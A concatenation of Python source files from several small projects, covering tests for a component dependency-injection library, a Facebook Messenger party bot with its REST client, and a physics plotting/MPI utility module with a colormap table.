self.key = key
class Comp(Component):
key = 7
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 7}
assert c.sub.key == 7
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
c = SubComp.resolve()
assert c.get_params() == {'key': 3}
assert c.key == 3
def test_component_override():
class SubComp(Component):
def __init__(self, par1=3):
self.par1 = par1
class OtherComp(Component):
def __init__(self, par2=5):
self.par2 = par2
class Comp(Component):
sub: OtherComp
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'par2': 5}
assert type(c.sub) == OtherComp
c = Comp.resolve(par2=8)
assert c.get_params()['sub'].get_params() == {'par2': 8}
assert type(c.sub) == OtherComp
with pytest.raises(TypeError):
Comp.resolve(par1=42)
def test_component_override_parent():
class SubComp(Component):
def __init__(self, par1=3):
self.par1 = par1
class OtherComp(Component):
def __init__(self, par2=5):
self.par2 = par2
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
class ParentComp(Comp):
sub: OtherComp
c = ParentComp.resolve()
assert c.get_params()['sub'].get_params() == {'par2': 5}
assert type(c.sub) == OtherComp
c = ParentComp.resolve(par2=8)
assert c.get_params()['sub'].get_params() == {'par2': 8}
assert type(c.sub) == OtherComp
with pytest.raises(TypeError):
ParentComp.resolve(par1=42)
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'par1': 3}
assert type(c.sub) == SubComp
c = Comp.resolve(par1=8)
assert c.get_params()['sub'].get_params() == {'par1': 8}
assert type(c.sub) == SubComp
with pytest.raises(TypeError):
Comp.resolve(par2=42)
def test_component_override_subcomponent_type():
class OtherComp(Component):
def __init__(self, par2=5):
self.par2 = par2
class OtherComp2(Component):
def __init__(self, par3=42):
self.par3 = par3
class SubComp(Component):
def __init__(self, sub1: OtherComp, par1=3):
self.sub1 = sub1
self.par1 = par1
class Comp(Component):
sub1: OtherComp2
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve()
assert type(c.sub.sub1) == OtherComp2
c = Comp.resolve(par1=2)
assert c.sub.par1 == 2
with pytest.raises(TypeError):
Comp.resolve(par2=42)
c = Comp.resolve(par3=7)
assert c.sub.sub1.par3 == 7
def test_component_override_subcomponent_type_full_name():
class OtherComp(Component):
def __init__(self, par2=5):
self.par2 = par2
class OtherComp2(Component):
def __init__(self, par3=42):
self.par3 = par3
class SubComp(Component):
def __init__(self, sub1: OtherComp, par1=3):
self.sub1 = sub1
self.par1 = par1
class Comp(Component):
sub_sub1: OtherComp2
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve()
assert type(c.sub.sub1) == OtherComp2
c = Comp.resolve(par1=2)
assert c.sub.par1 == 2
with pytest.raises(TypeError):
Comp.resolve(par2=42)
c = Comp.resolve(par3=7)
assert c.sub.sub1.par3 == 7
def test_parent_component_override_child_type():
class SubComp(Component):
pass
class OtherComp(Component):
pass
class ParentComp(Component):
sub: OtherComp
def __init__(self):
pass
class Comp(ParentComp):
def __init__(self, sub: SubComp):
super().__init__()
self.sub = sub
c = Comp.resolve()
assert type(c.sub) == OtherComp
def test_parent_component_override_child_par():
class SubComp(Component):
def __init__(self, par1 = 42):
self.par1 = par1
class ParentComp(Component):
key = 5
par1 = 9
def __init__(self):
pass
class Comp(ParentComp):
def __init__(self, sub: SubComp, key=3):
super().__init__()
self.key = key
self.sub = sub
c = Comp.resolve()
assert c.key == 5
assert c.sub.par1 == 9
def test_subcomponent_cant_override_owner_type():
class SubComp1(Component):
pass
class SubComp2(Component):
pass
class OtherComp(Component):
par1 = 5
sub: SubComp2
class Comp(Component):
def __init__(self, other: OtherComp, sub: SubComp1, par1=9):
super().__init__()
self.other = other
self.sub = sub
self.par1 = par1
c = Comp.resolve()
assert c.par1 == 9
assert type(c.sub) == SubComp1
def test_cant_change_type_of_non_component_to_component():
class SubComp(Component):
pass
class ParentComp(Component):
def __init__(self, par1: int):
self.par1 = par1
class Comp(ParentComp):
par1: SubComp
with pytest.raises(TypeError):
Comp.resolve()
def test_resolve_component_list():
from typing import Tuple
class SubComp1(Component):
def __init__(self, par=42, par1: int = 3):
self.par = par
self.par1 = par1
class SubComp2(Component):
def __init__(self, par=9, par2: str = "Test"):
self.par = par
self.par2 = par2
class Comp(Component):
def __init__(self, components: Tuple[Component, ...]):
self.components = components
c = Comp.resolve()
assert len(c.components) == 0
class ParentComp(Comp):
components: Tuple[SubComp1, SubComp2]
c = ParentComp.resolve()
assert len(c.components) == 2
assert type(c.components[0]) == SubComp1 and c.components[0].par == 42 and c.components[0].par1 == 3
assert type(c.components[1]) == SubComp2 and c.components[1].par == 9 and c.components[1].par2 == "Test"
c = ParentComp.resolve(par1=5, par2="Hello", components_0_par=1, components_1_par=2)
assert len(c.components) == 2
assert type(c.components[0]) == SubComp1 and c.components[0].par == 1 and c.components[0].par1 == 5
assert type(c.components[1]) == SubComp2 and c.components[1].par == 2 and c.components[1].par2 == "Hello"
with pytest.raises(TypeError):
kwargs = {'0_par': 1}
ParentComp.resolve(**kwargs)
with pytest.raises(TypeError):
ParentComp.resolve(par=5)
def test_dont_override_param_with_function():
class SubComp(Component):
def __init__(self, key=42):
self.key = key
class Comp(Component):
def par(self):
return 3
@property
def key(self):
return 9
def __init__(self, sub: SubComp, par=5):
self.sub = sub
self.par = par
c = Comp.resolve()
assert c.par == 5 and c.sub.key == 42
def test_annotations_subclass_included():
class SubComp(Component):
def __init__(self, key: int):
self.key = key
class Base(Component):
key: str
class Comp(Base):
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve(key=3)
with pytest.warns(None) as r:
Comp.resolve(key="3")
assert len(r) == 0
def test_annotations_subsubclass_included():
class SubComp(Component):
def __init__(self, key: int):
self.key = key
class BaseBase(Component):
key: str
class Base(BaseBase):
pass
class Comp(Base):
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve(key=3)
with pytest.warns(None) as r:
Comp.resolve(key="3")
assert len(r) == 0
def test_annotations_forward_ref_init():
class Comp(Component):
def __init__(self, sub: 'SubComp'):
self.sub = sub
class SubComp(Component):
def __init__(self, key: int = 3):
self.key = key
# class needs to be defined in globals.
# We simulate this in the function to not hinder other tests:
globals()['SubComp'] = SubComp
c = Comp.resolve()
assert type(c.sub) == SubComp
def test_annotations_forward_ref_attribute():
class SubComp(Component):
def __init__(self, key: int = 3):
self.key = key
class Comp(Component):
sub: 'OtherComp'
def __init__(self, sub: SubComp):
self.sub = sub
class OtherComp(Component):
def __init__(self, key: int = 3):
self.key = key
# class needs to be defined in globals.
# We simulate this in the function to not hinder other tests:
globals()['OtherComp'] = OtherComp
c = Comp.resolve()
assert type(c.sub) == OtherComp
```
#### File: Components/examples/example_app.py
```python
from components import Component
from components.cli import CLI
class LogWriter(Component):
def __init__(self, path: str = "logs/logfile.txt"):
self.path = path
class RotationalLogWriter(LogWriter):
def __init__(self, path: str = "logs/logfile.txt", rotations: int = 5):
super().__init__(path)
self.rotations = rotations
class Application(Component):
def __init__(self, logger: LogWriter, parameter1: int = 42):
self.parameter1 = parameter1
self.logger = logger
def run(self):
print("paramter1:", self.parameter1)
print("logger:", type(self.logger))
print("log path:", self.logger.path)
class CustomApplication(Application):
logger: RotationalLogWriter
parameter1 = 8
def run(self):
super().run()
print("log rotations:", self.logger.rotations)
cli = CLI()
class ApplicationAsCommand(Application, cli.Command):
logger: RotationalLogWriter
def run(self):
super().run()
print("log rotations:", self.logger.rotations)
if __name__ == "__main__":
app = Application.resolve()
print("app.run")
app.run()
custom_app = CustomApplication.resolve()
print("\ncustom_app.run")
custom_app.run()
print("\ncli.run")
cli.run()
``` |
{
"source": "JoeyDP/Party-Post",
"score": 2
} |
#### File: partypost/facebook/chat_profile.py
```python
import json
import requests
from util import *
from ..partybot import PartyBot
PROFILE_URL = "https://graph.facebook.com/me/messenger_profile"
HEADERS = {"Content-Type": "application/json"}
def post(data, accessToken):
jsonData = json.dumps(data)
r = requests.post(PROFILE_URL, params={"access_token": accessToken}, headers=HEADERS, data=jsonData)
if r.status_code != 200:
log("error: {}".format(str(r.status_code)))
log(r.text)
def setup(page):
log("setting up profile")
startButton = getStartedButtonData()
welcome = getWelcomeData()
menu = getMenuData()
data = {**startButton, **welcome, **menu}
log(data)
post(data, page.access_token)
def getStartedButtonData():
data = {
"get_started": {
"payload": json.dumps(PartyBot.sendWelcome())
}
}
return data
def getWelcomeData():
data = {"greeting": [
{
"locale": "default",
"text": "Let's get this party started!"
}
]
}
return data
def getMenuData():
# menu = {
# "locale": "default",
# "composer_input_disabled": False,
# "call_to_actions": [
#
# ],
# }
#
# data = {
# "persistent_menu": [menu]
# }
data = dict()
return data
```
#### File: partypost/facebook/message.py
```python
import json
import requests
from util import *
from partypost import redisCon
MESSAGE_URL = "https://graph.facebook.com/v2.11/me/messages"
HEADERS = {"Content-Type": "application/json"}
class Message:
def __init__(self):
pass
def getData(self):
data = dict()
data["recipient"] = dict()
data["message"] = dict()
return data
def _send(self, recipient, page, isResponse=True):
log("sending message to {}".format(recipient))
data = self.getData()
data["recipient"]["id"] = recipient.id
if isResponse:
data["messaging_type"] = "RESPONSE"
else:
data["messaging_type"] = "NON_PROMOTIONAL_SUBSCRIPTION"
jsonData = json.dumps(data)
log(jsonData)
r = requests.post(MESSAGE_URL, params={"access_token": page.access_token}, headers=HEADERS, data=jsonData)
return r
def send(self, recipient, page, isResponse=True):
r = self._send(recipient, page, isResponse=isResponse)
return self._checkResponse(r)
def _checkResponse(self, r):
if r.status_code != 200:
log(r.status_code)
log(r.text)
return False
return True
class TextMessage(Message):
def __init__(self, text):
super().__init__()
self.text = text
def getData(self):
data = super().getData()
data["message"]["text"] = self.text
return data
class URLAttachmentMessage(Message):
cache = dict()
def __init__(self, url, attachmentType='file', isReusable=True):
super().__init__()
self.url = url
self.attachmentType = attachmentType
self.isReusable = isReusable
self.cache_key = ("fb_attachment_id", self.url, self.attachmentType)
def getData(self):
data = super().getData()
data["message"]["attachment"] = {
'type': self.attachmentType
}
cachedID = redisCon.get(self.cache_key)
if cachedID:
data["message"]["attachment"]["payload"] = {
"attachment_id": cachedID.decode()
}
else:
data["message"]["attachment"]["payload"] = {
"url": self.url
}
if self.isReusable:
data["message"]["attachment"]["payload"]["is_reusable"] = True
return data
# def _send(self, *args, **kwargs):
# r = super()._send(*args, **kwargs)
# if self.isReusable and r.status_code == 200:
# data = r.json()
# attachment_id = data.get('attachment_id')
# if attachment_id:
# redisCon.set(self.cache_key, attachment_id, ex=60*60*24*7) # cache for 1 week
# return r
def _checkResponse(self, r):
if super()._checkResponse(r):
if self.isReusable:
data = r.json()
attachment_id = data.get('attachment_id')
if attachment_id:
redisCon.set(self.cache_key, attachment_id, ex=60 * 60 * 24 * 7) # cache for 1 week
return True
return False
class ImageMessage(URLAttachmentMessage):
def __init__(self, image):
super().__init__(image, attachmentType='image')
class ButtonMessage(Message):
def __init__(self, text, *buttons):
super().__init__()
self.text = text
if len(buttons) > 3:
raise RuntimeError("ButtonMessage can only have 3 options.")
self.buttons = list(buttons)
def getData(self):
data = super().getData()
data["message"] = {
"attachment": {
"type": "template",
"payload": {
"template_type": "button",
"text": self.text,
"buttons": [button.getData() for button in self.buttons]
}
}
}
return data
def addButton(self, text, payload=None, url=None):
if len(self.buttons) == 3:
raise RuntimeError("ButtonMessage can only have 3 options.")
if url is None:
self.buttons.append(Button(text, payload))
elif payload is None:
self.buttons.append(URLButton(text, url))
else:
raise RuntimeError("Both url and payload given for button, pick one.")
class GenericMessage(Message):
def __init__(self):
super().__init__()
self.elements = list()
def getData(self):
data = super().getData()
data["message"] = {
"attachment": {
"type": "template",
"payload": {
"template_type": "generic",
"sharable": False,
"image_aspect_ratio": "square",
"elements": [element.getData() for element in self.elements]
}
}
}
return data
def addElement(self, element):
if len(self.elements) == 10:
raise RuntimeError("GenericMessage can only have 10 elements.")
self.elements.append(element)
class Element:
def __init__(self, title, subtitle, url=None, image=None):
self.title = title
self.subtitle = subtitle
self.url = url
self.image = image
self.buttons = list()
def getData(self):
data = {
"title": self.title,
"subtitle": self.subtitle,
}
if len(self.buttons) > 0:
data["buttons"] = [button.getData() for button in self.buttons]
if self.image:
data["image_url"] = self.image
if self.url:
data["default_action"] = {
"type": "web_url",
"url": self.url,
}
return data
def addButton(self, text, payload=None, url=None):
if len(self.buttons) == 3:
raise RuntimeError("Element can only have 3 options.")
if url is None:
self.buttons.append(Button(text, payload))
elif payload is None:
self.buttons.append(URLButton(text, url))
else:
raise RuntimeError("Both url and payload given for button, pick one.")
class Button:
def __init__(self, text, data):
self.text = text
if type(data) == dict:
self.payload = data
else:
raise RuntimeError("Button payload has unknown type: " + str(type(data)))
def getData(self):
return {
"type": "postback",
"title": self.text,
"payload": json.dumps(self.payload)
}
class URLButton:
def __init__(self, title, url):
self.title = title
self.url = url
def getData(self):
return {
"type": "web_url",
"title": self.title,
"url": self.url,
}
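# Minimal usage sketch (hypothetical objects: `recipient` is assumed to expose an
# `id` and `page` an `access_token`, as used by Message._send above):
#
#   msg = TextMessage("Let's get this party started!")
#   msg.send(recipient, page)
#
#   buttons = ButtonMessage("What would you like to do?")
#   buttons.addButton("Show photos", payload={"action": "photos"})
#   buttons.addButton("Visit page", url="https://example.com")
#   buttons.send(recipient, page, isResponse=False)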
```
#### File: JoeyDP/Party-Post/update.py
```python
import bacli
from partypost.database import Page, Image
from util import log, debug
from RESTfacebook import FacebookAPI
from RESTfacebook.page import Page as FBPage
from RESTapi import RequestException
from tqdm import tqdm
bacli.setDescription("Commands for updating database")
@bacli.command
def run():
""" Runs cleanup followed by crawl. """
log("Started update")
cleanup()
crawl()
log("Finished update")
@bacli.command
def cleanup():
""" Checks for all images whether they still exist on Facebook. Otherwise they are removed. """
log("Running cleanup")
for page in Page.all():
api = FacebookAPI(page.access_token)
for image in page.images:
if image.fb_photo_id:
try:
post = api.getPost(image.fb_photo_id)
log("Image with id {} and url {} still good.".format(image.id, image.url))
except RequestException as e:
data = e.request.json()
if 'error' in data:
error = data['error']
if int(error.get('code', 0)) == 100:
log("Image with id {} and url {} was removed from Facebook.".format(image.id, image.url))
log("Deleting it from the database.")
image.delete()
log("")
@bacli.command
def crawl():
""" Crawls every page for new images that may have been posted. """
log("Running crawl")
for page in Page.all():
api = FacebookAPI(page.access_token)
pageApi = FBPage(api, id=page.id)
photos = pageApi.getPhotos(type='uploaded', fields='images')
for photo in tqdm(photos):
tqdm.write("Processing photo with id {}".format(str(photo.id)), end='\t->\t')
if Image.findByPhotoId(photo.id):
# Note: if photos are returned in chronological order, the loop could stop here to improve performance.
tqdm.write("Already present")
else:
tqdm.write("Not in database yet, adding it")
fbImage = _getBestImage(photo.images)
image = Image()
image.sender = None
image.page = page
image.fb_attachment_url = fbImage.source
image.fb_photo_id = photo.id
image.add()
def _getBestImage(images):
return max(images, key=lambda x: x.width * x.height)
``` |
{
"source": "JoeyDP/REST-Client",
"score": 3
} |
#### File: REST-Client/RESTapi/api.py
```python
import sys
from urllib.parse import urljoin
import requests
from .util import decorator
@decorator
def API(cls, base_url):
b = base_url
class A(cls):
base_url = b
suffix = ""
@property
def api(self):
return self
return A
class RequestPage(object):
def __init__(self, response):
self.response = response
@property
def data(self):
return self.response.json()
@property
def items(self):
return self.data.get('data', list())
@property
def itemCount(self):
return None
def getNextUrl(self):
""" Return next url or raise StopIteration if end """
raise NotImplementedError()
class Paginator(object):
def __init__(self, page):
self.page = page
self.itemCount = self.page.itemCount
def fetchNext(self):
response = makeRequest(self.page.getNextUrl())
if not response.ok:
print("Request failed")
print(response.text)
raise StopIteration
self.page = self.page.__class__(response)
def __iter__(self):
while True:
yield self.page
# PEP 479: a StopIteration escaping fetchNext() inside this generator would
# surface as a RuntimeError, so convert it into a clean end of iteration.
try:
self.fetchNext()
except StopIteration:
return
def __len__(self):
return self.itemCount
@decorator
def Entity(cls):
class E(cls):
def __init__(self, api, **data):
self.api = api
# print(data)
for name in dir(cls):
attr = getattr(cls, name)
if isinstance(attr, Property):
try:
value = attr.parse(data.get(name))
except RuntimeError as e:
print("Attribute with name '{}' missing".format(name), file=sys.stderr)
raise e
setattr(self, name, value)
@property
def suffix(self):
return str(self.id) + '/'
@property
def base_url(self):
return self.api.base_url
@property
def token(self):
return self.api.token
return E
def makeRequest(url, *args, **kwargs):
r = requests.get(url, *args, **kwargs)
return r
@decorator
def GET(func, suffix="", paginate=False):
def wrapper(self, *args, **kwargs):
Type = func(self, *args, **kwargs)
the_suffix = suffix
url = urljoin(self.base_url, self.suffix)
url = urljoin(url, the_suffix)
for arg in args:
url = urljoin(url, arg)
params = {key: arg for key, arg in kwargs.items() if arg is not None}
params['access_token'] = self.token
# print(url)
r = makeRequest(url, params=params)
if not r.ok:
print("Request failed")
print("status", str(r.status_code))
print(r.text)
raise RequestException(r)
if paginate:
return self.api.paginate(Type, r)
else:
data = r.json()
entity = Type(self.api, **data)
return entity
return wrapper
def POST(f):
pass
class RequestException(Exception):
def __init__(self, request):
super().__init__()
self.request = request
class Property(object):
def __init__(self, required=True):
self.required = required
def parse(self, value):
if value is None:
if self.required:
raise RuntimeError("Missing required attribute")
else:
return
return self._parse(value)
def _parse(self, value):
raise NotImplementedError("subclasses should implement Property._parse")
class StringProperty(Property):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _parse(self, value):
return str(value)
class IntProperty(Property):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _parse(self, value):
return int(value)
# class CompoundProperty(Property):
# def _parse(self, data):
# for name in dir(self.__class__):
# attr = getattr(self.__class__, name)
# if isinstance(attr, Property):
# value = attr.parse(data.get(name))
# setattr(self, name, value)
class ListProperty(Property):
def __init__(self, cls, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cls = cls
def _parse(self, data):
elements = list()
for elem in data:
instance = self.cls()
for name in dir(self.cls):
attr = getattr(self.cls, name)
if isinstance(attr, Property):
value = attr.parse(elem.get(name))
setattr(instance, name, value)
elements.append(instance)
return elements
``` |
{
"source": "JoeyDP/REST-Facebook",
"score": 2
} |
#### File: REST-Facebook/RESTfacebook/page.py
```python
from RESTapi import Entity, GET, StringProperty
from .post import Post
from .photo import Photo
@Entity
class Page(object):
# parameters
id = StringProperty()
name = StringProperty(required=False)
def __str__(self):
return self.name
@GET(suffix="posts/", paginate=True)
def getPosts(self):
return Post
@GET(suffix="photos/", paginate=True)
def getPhotos(self, type=None, fields=None):
""" type can be: uploaded """
return Photo
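# Usage sketch (mirrors update.py in the Party-Post repo; `api` is assumed to be
# a FacebookAPI instance created with a page access token):
#
#   page = Page(api, id="123456789")
#   for photo in page.getPhotos(type='uploaded', fields='images'):
#       print(photo.id)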
``` |
{
"source": "joeydumont/python-tools",
"score": 3
} |
#### File: joeydumont/python-tools/vphys.py
```python
def mkdir_p(mypath):
"""
Creates a directory; equivalent to using mkdir -p on the command line.
"""
from errno import EEXIST
from os import makedirs,path
try:
makedirs(mypath)
except OSError as exc: # Python >2.5
if exc.errno == EEXIST and path.isdir(mypath):
pass
else: raise
# ---------------------------- Utility Functions ---------------------------- #
def user_mod(value, modulo):
"""
Modulo function that works for both positive and negative "value."
"""
import numpy as np
return value-np.abs(modulo)*np.floor(value/np.abs(modulo))
# ----------------------------- numpy Functions ----------------------------- #
def find_nearest(array,value):
"""
Find the value in an array closest to a specified value. Return the index and
value.
"""
import math
import numpy as np
idx = np.searchsorted(array, value, side="left")
if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):
return idx-1, array[idx-1]
else:
return idx, array[idx]
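# Example (illustrative): find_nearest(np.array([1, 2, 4, 8]), 5) returns (2, 4),
# i.e. the index and the value of the closest element.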
# --------------------------- matplotlib Functions -------------------------- #
def adjust_spines(ax, spines, points_outward=10):
"""
Helps in re-creating the spartan style of Jean-luc Doumont's graphs.
Removes the spines that are not specified in spines, and colours the specified
ones in gray, and pushes them outside the graph area.
"""
for loc, spine in ax.spines.items():
if loc in spines:
spine.set_position(('outward', points_outward)) # outward by 10 points
#spine.set_smart_bounds(True)
spine.set_color('gray')
else:
spine.set_color('none') # don't draw spine
# turn off ticks where there is no spine
if 'left' in spines:
ax.yaxis.set_ticks_position('left')
else:
# no yaxis ticks
ax.yaxis.set_ticks([])
if 'bottom' in spines:
ax.xaxis.set_ticks_position('bottom')
else:
# no xaxis ticks
ax.xaxis.set_ticks([])
def default_pgf_configuration():
"""
Defines a default configuration for the pgf engine of matplotlib, with
LaTeX support.
"""
pgf_with_pdflatex = {
"font.family": "serif", # use serif/main font for text elements
"text.usetex": True, # use inline math for ticks
"pgf.rcfonts": False, # don't setup fonts from rc parameters
"pgf.preamble": [
r"\usepackage{amsmath}",
#r"\usepackage{mathspec}",
r"\usepackage[charter]{mathdesign}",
r"\usepackage{fontspec}",
#r"\setmathfont{Fira Sans}",
#r"\setmainfont{Oswald}",
r"\usepackage{siunitx}",
r"\sisetup{math-micro=\text{µ},text-micro=µ}"
]
}
return pgf_with_pdflatex
def BarPlotWithLogAxes(ax_handle,x,y,width, xdelta=0.0, **plot_kwargs):
"""
Plots a bar graph with a log-scaled x axis by manually filling rectangles.
The bar corners are computed in log10 space so that every bar keeps the same visual width on the logarithmic axis.
"""
import matplotlib.pyplot as plt
import numpy as np
for i in range(len(x)):
artist, = ax_handle.fill([10**(np.log10(x[i])-width-xdelta), 10**(np.log10(x[i])-width-xdelta), 10**(np.log10(x[i])+width-xdelta),10**(np.log10(x[i])+width-xdelta)], [0, y[i], y[i], 0],**plot_kwargs)
return artist
# ------------------------------ MPI Functions ------------------------------ #
def GenerateIndicesForDifferentProcs(nprocs, loopsize):
"""
Generates a list that contains the elements of the loops that each
rank will process. In the case that the number of processors does not divide
the loop size, We divide the rest of the work amongst the first (loopsize % nprocs)
processors.
"""
import numpy as np
from mpi4py import MPI  # assumed MPI binding; imported here to match the module's in-function import style
rank = MPI.COMM_WORLD.Get_rank()
if (nprocs <= loopsize):
sizes = divmod(loopsize,nprocs)
indices_rank = np.empty((sizes[0]), dtype=int)
for i in range(sizes[0]):
indices_rank[i] = rank*sizes[0]+i
if rank < sizes[1]:
# the leftover indices start after the evenly divided block, at nprocs*sizes[0]
indices_rank = np.append(indices_rank, nprocs*sizes[0] + rank)
elif (nprocs > loopsize):
indices_rank = None
if rank < loopsize:
indices_rank = np.array([rank])
return indices_rank
# ------------------------ Cluster-Related Functions ------------------------ #
def ListSimulationDirectories(bin_dir):
"""
We count the directories whose names end in \d{5}.BQ. This gives us the
number of simulations that we ran, as well as their names.
"""
import os
import re
dirList = [f for f in os.listdir(bin_dir) if re.search(r'(.*\d{5}.BQ)', f)]
sortedList = sorted(dirList, key=str.lower)
for i in range(len(sortedList)):
sortedList[i] += "/{:05g}.BQ/".format(i+1)
return sortedList
# -------------------------- matplotlib variables --------------------------- #
# -- morgenstemning colormap
# https://www.osapublishing.org/DirectPDFAccess/1A428D10-90A3-7D1F-A46F3712F727F357_252779/oe-21-8-9862.pdf
import matplotlib as mpl
morgen_colors=[[0.0, 0.0, 0.0],
[0.0003007843137254902, 0.004015294117647059, 0.005722352941176471],
[0.0005015686274509805, 0.007930588235294118, 0.011444705882352942],
[0.0007035294117647059, 0.011845882352941177, 0.017168235294117647],
[0.0010047058823529412, 0.015759607843137256, 0.022989411764705883],
[0.0013058823529411765, 0.019576470588235292, 0.028713725490196077],
[0.0016094117647058822, 0.023491764705882354, 0.034534117647058826],
[0.002010980392156863, 0.027404313725490195, 0.04025921568627451],
[0.002412549019607843, 0.031219215686274508, 0.04608196078431372],
[0.0028141176470588237, 0.03503411764705883, 0.051904705882352936],
[0.0032196078431372547, 0.038849019607843135, 0.057727450980392156],
[0.0037215686274509802, 0.04266392156862745, 0.06355019607843138],
[0.004223529411764706, 0.04647411764705882, 0.0693729411764706],
[0.0047305882352941175, 0.05018862745098039, 0.0751956862745098],
[0.005332941176470589, 0.053903137254901964, 0.08102392156862745],
[0.0059352941176470594, 0.05761764705882353, 0.08694705882352942],
[0.006543921568627451, 0.061325882352941175, 0.09287019607843137],
[0.007246666666666667, 0.06494, 0.09879333333333333],
[0.007949411764705882, 0.06854705882352942, 0.1047164705882353],
[0.008659607843137256, 0.07206823529411766, 0.11063960784313726],
[0.009462745098039215, 0.07568235294117646, 0.11656274509803922],
[0.010274117647058822, 0.07928823529411765, 0.12248588235294117],
[0.011177647058823528, 0.08280196078431372, 0.12840901960784315],
[0.012081176470588236, 0.0863156862745098, 0.1343411764705882],
[0.012994117647058823, 0.0898294117647059, 0.14035529411764705],
[0.013998039215686275, 0.09333333333333334, 0.14627843137254903],
[0.015001960784313725, 0.09675686274509804, 0.15221176470588235],
[0.016016470588235295, 0.10025999999999999, 0.15822470588235293],
[0.01712078431372549, 0.1036843137254902, 0.16415882352941177],
[0.01823647058823529, 0.10718666666666667, 0.17017098039215686],
[0.019441176470588233, 0.1106, 0.17609411764705885],
[0.020645882352941177, 0.11401333333333333, 0.18201725490196077],
[0.021850588235294118, 0.11743921568627451, 0.18794039215686273],
[0.023068235294117646, 0.12095294117647058, 0.1938505882352941],
[0.024373333333333334, 0.12446666666666667, 0.19968666666666665],
[0.02567843137254902, 0.12798039215686274, 0.20559607843137254],
[0.02699764705882353, 0.13149411764705882, 0.21143294117647057],
[0.02840313725490196, 0.13499333333333333, 0.217341568627451],
[0.029808627450980393, 0.13840666666666668, 0.2231792156862745],
[0.03122941176470588, 0.14182, 0.22908705882352942],
[0.03275098039215686, 0.14521764705882353, 0.23492549019607842],
[0.03437333333333333, 0.14853058823529414, 0.2408486274509804],
[0.03608, 0.1518435294117647, 0.24677176470588236],
[0.03780352941176471, 0.15513960784313727, 0.25271176470588236],
[0.039627843137254905, 0.1583349019607843, 0.25871803921568626],
[0.04153529411764706, 0.16146470588235293, 0.26464117647058827],
[0.043460784313725485, 0.16465921568627453, 0.27056431372549017],
[0.04548705882352941, 0.16778980392156864, 0.2764874509803922],
[0.047595294117647055, 0.1710023529411765, 0.28239176470588234],
[0.049722745098039214, 0.1742149019607843, 0.28821450980392155],
[0.05195098039215686, 0.17740784313725488, 0.2940372549019608],
[0.05428, 0.18052, 0.29985999999999996],
[0.05670980392156863, 0.1835913725490196, 0.3056827450980392],
[0.059261176470588234, 0.1865027450980392, 0.3115262745098039],
[0.061992941176470584, 0.18937176470588235, 0.3174494117647059],
[0.06482549019607843, 0.19208235294117648, 0.3233725490196078],
[0.06778078431372549, 0.19479294117647059, 0.3292956862745098],
[0.07091529411764706, 0.19745882352941174, 0.33519647058823526],
[0.07419607843137256, 0.19994588235294117, 0.341064705882353],
[0.07775607843137256, 0.20228588235294118, 0.34706509803921565],
[0.08154117647058823, 0.2043705882352941, 0.35301176470588236],
[0.08562862745098039, 0.20630666666666667, 0.35903529411764706],
[0.09004274509803921, 0.20791607843137255, 0.36505882352941177],
[0.09490941176470588, 0.20909764705882353, 0.3711317647058823],
[0.10045607843137254, 0.20972509803921568, 0.3773560784313726],
[0.1068843137254902, 0.20980000000000001, 0.3835294117647059],
[0.11404117647058824, 0.20977411764705883, 0.3894494117647059],
[0.12172823529411765, 0.20967372549019608, 0.39501882352941176],
[0.12996666666666667, 0.20954666666666666, 0.40036000000000005],
[0.13860823529411764, 0.20931882352941178, 0.40539882352941176],
[0.14768039215686274, 0.20899019607843136, 0.4101352941176471],
[0.15720078431372547, 0.2085886274509804, 0.4145972549019608],
[0.1670235294117647, 0.20815882352941176, 0.4188294117647059],
[0.17712, 0.20765686274509804, 0.4227878431372549],
[0.1874470588235294, 0.2071258823529412, 0.4264866666666666],
[0.1980764705882353, 0.20649411764705883, 0.4298411764705882],
[0.20900823529411766, 0.20576156862745099, 0.4329643137254902],
[0.2202121568627451, 0.20492823529411766, 0.4358152941176471],
[0.2315870588235294, 0.20399411764705883, 0.43843411764705886],
[0.2430937254901961, 0.20295921568627454, 0.440781568627451],
[0.2547392156862745, 0.2018235294117647, 0.44292745098039216],
[0.26638470588235297, 0.20061882352941177, 0.4449035294117647],
[0.2780945098039216, 0.19934980392156865, 0.4467145098039216],
[0.2899407843137255, 0.1979443137254902, 0.44828823529411765],
[0.30182000000000003, 0.1965058823529412, 0.4496952941176471],
[0.31376666666666664, 0.19493333333333332, 0.4508666666666667],
[0.3257470588235294, 0.1931929411764706, 0.4519035294117647],
[0.33779411764705886, 0.19135176470588236, 0.4527729411764706],
[0.3498756862745098, 0.18940980392156864, 0.45350705882352943],
[0.36198823529411767, 0.1873321568627451, 0.45407450980392156],
[0.3740352941176471, 0.1851235294117647, 0.4545411764705882],
[0.3860466666666667, 0.1828435294117647, 0.4549070588235294],
[0.3979572549019608, 0.18039803921568628, 0.4551721568627451],
[0.4098035294117647, 0.17788823529411765, 0.45537294117647054],
[0.42161294117647063, 0.17537843137254902, 0.455536862745098],
[0.4332843137254902, 0.17283137254901962, 0.4556],
[0.44479176470588233, 0.17025882352941174, 0.4556],
[0.45619843137254906, 0.1677870588235294, 0.4555619607843137],
[0.4675043137254902, 0.16537764705882355, 0.455461568627451],
[0.4787094117647059, 0.16296823529411764, 0.4553223529411765],
[0.4898137254901961, 0.16055882352941178, 0.45512156862745096],
[0.5007776470588235, 0.15810980392156862, 0.4549207843137255],
[0.51162, 0.15564, 0.45471999999999996],
[0.5224219607843137, 0.15323058823529412, 0.45447882352941177],
[0.533123137254902, 0.15082117647058824, 0.4541776470588235],
[0.5437235294117647, 0.14841176470588235, 0.45383529411764706],
[0.554264705882353, 0.14600235294117647, 0.4534337254901961],
